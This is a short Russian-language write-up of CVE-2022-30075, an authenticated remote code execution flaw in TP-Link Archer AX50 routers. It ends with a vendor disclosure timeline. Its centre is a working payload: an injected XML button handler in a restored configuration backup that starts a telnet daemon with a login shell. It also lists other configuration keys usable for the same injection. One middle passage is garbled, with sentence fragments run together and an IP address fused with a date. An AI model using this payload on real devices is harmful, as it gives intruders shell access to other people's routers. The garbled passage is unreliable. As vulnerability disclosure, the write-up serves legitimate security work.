
Tp-Link Archer AX50 Authenticated RCE (CVE-2022-30075)
Аутентифицированное удаленное выполнение кода в маршрутизаторах Tp-Link
Если ваш маршрутизатор Tp-Link имеет функцию резервного копирования и восстановления, а прошивка старше июня 2022 года, он, вероятно, уязвим.
Tp-Link Archer AX50, другие маршрутизаторы tplink могут использовать другой формат резервных копий, и эксплойт необходимо модифицировать.
Использование эксплойта для запуска демона telnet на маршрутизаторе

<button name="led_switch">
<action>pressed</action>
<button>ledswitch</button>
<handler>/lib/led_switch</handler>
</button>
<button name="exploit">
<action>pressed</action>
<button>ledswitch</button>
<handler>/usr/sbin/telnetd -l /bin/login.sh</handler>
</button>
system.button.handler, но его можно легко обойти, изменив имя родительского xml-узла (например, name=\"exploit\")system.button.handler, но также с помощью ddns.service.ip_script, firewall.include.path, uhttpd.main и других.../usr/sbin/telnetd -l /bin/login.shtelnet 192.168.1.115.03.2022 - Выявлена уязвимость
15.03.2022 - Связался со службой поддержки Tp-Link
16.03.2022 - Получен ответ от Tp-Link
02.05.2022 - Назначен CVE
27.05.2022 - Tp-Link выпустил прошивку с исправленной уязвимостью
07.06.2022 - Опубликованы технические подробности